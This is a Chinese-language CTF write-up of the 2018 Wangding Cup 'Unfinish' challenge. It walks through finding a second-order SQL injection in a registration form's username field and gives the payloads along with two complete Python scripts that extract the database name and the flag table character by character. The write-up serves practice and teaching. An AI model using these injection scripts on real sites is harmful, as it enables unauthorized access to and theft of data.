[网鼎杯]2018Unfinish

使用ctf在线靶场https://adworld.xctf.org.cn/home/index。

进入靶场，发现是一个登录页面。

使用awvs进行扫描，发现存在login.php和register.php，并且register.php存在sql注入漏洞。

访问一下register.php试试，发现是一个注册页面。

在邮箱、用户名、密码分别尝试sql注入。

发现邮箱后面不允许添加符号'等，密码添加'等会被当做字符传入，而在用户名的地方输入'，注册失败，怀疑是在用户名处存在sql注入。

随便注册一个试试。

登陆进去发现，在页面中存在用户名的显示。

在用户名处输入

dhh ' and '1'='1

注册成功，登陆查看用户名为0。基本确定为二次注入，注入点为用户名处。

使用burp判断被过滤的字符。初步爆破发现单引号、逗号、information被过滤。那就开始尝试

注册时，让用户名为select database()，尝试一下。

登陆后发现，用户名直接显示为select database()。那么猜测应该是被单引号或者双引号包裹起来，作为字符串了，尝试两种闭合。

使用1'+2+'1可以注册成功，那就证明单引号没被过滤掉，而且可以看出来后台接收语句应该是select...where username='username'。

开始尝试构建payload。

0'+database()+'0     #结果为0

尝试使用ascii进行转换为10进制尝试，下面是转换database()的第一个字符。

0'+ascii(substr((database()) from 1 for 1))+'0

查看ascii表，发现119为w，也就是当前数据库第一个字母为w。那证明目前的思路是正确的。

写python脚本进行爆破。

import requests
from bs4 import BeautifulSoup


def jieguo():
    name = ''
    url = 'http://61.147.171.105:58807/'
    url1 = url + 'register.php'
    url2 = url + 'login.php'
    for i in range(1, 100):
        data_register = {"email": f"dhh{i}@163.com",
                         "username": f"0'+ascii(substr((database()) from {i} for 1))+'0;",
                         "password": "123"}
        data_login = {"email": f"dhh{i}@163.com",
                      "password": "123"}
        response_regiseter = requests.post(url1, data=data_register)
        response_login = requests.post(url2, data=data_login)
        bs = BeautifulSoup(response_login.text, 'html.parser')  # bs4解析页面
        username = bs.find('span', class_='user-name')  # 取返回页面数据的span class=user-name属性
        number = username.text  # 取该属性的数字
        name += chr(int(number))
        print(name)


if __name__ == '__main__':
    jieguo()

额...不知道为什么爆破完库名之后还在输出。

目前为止二次注入的目的完成。

因为我们的目的不是为了拿到flag，所以我就上网查询了一下如何拿flag，并且写成payload

0'+ascii(substr((select * from flag) from 1 for 1))+'0

import requests
from bs4 import BeautifulSoup


def jieguo():
    name = ''
    url = 'http://61.147.171.105:58807/'
    url1 = url + 'register.php'
    url2 = url + 'login.php'
    for i in range(1, 100):
        data_register = {"email": f"dh{i}@163.com",
                         "username": f"0'+ascii(substr((select * from flag) from {i} for 1))+'0;",
                         "password": "1"}
        data_login = {"email": f"dh{i}@163.com", "password": "1"}
        response_regiseter = requests.post(url1, data=data_register)
        response_login = requests.post(url2, data=data_login)
        bs = BeautifulSoup(response_login.text, 'html.parser')  # bs4解析页面
        username = bs.find('span', class_='user-name')  # 取返回页面数据的span class=user-name属性
        number = username.text  # 取该属性的数字
        name += chr(int(number))
        print(name)


if __name__ == '__main__':
    jieguo()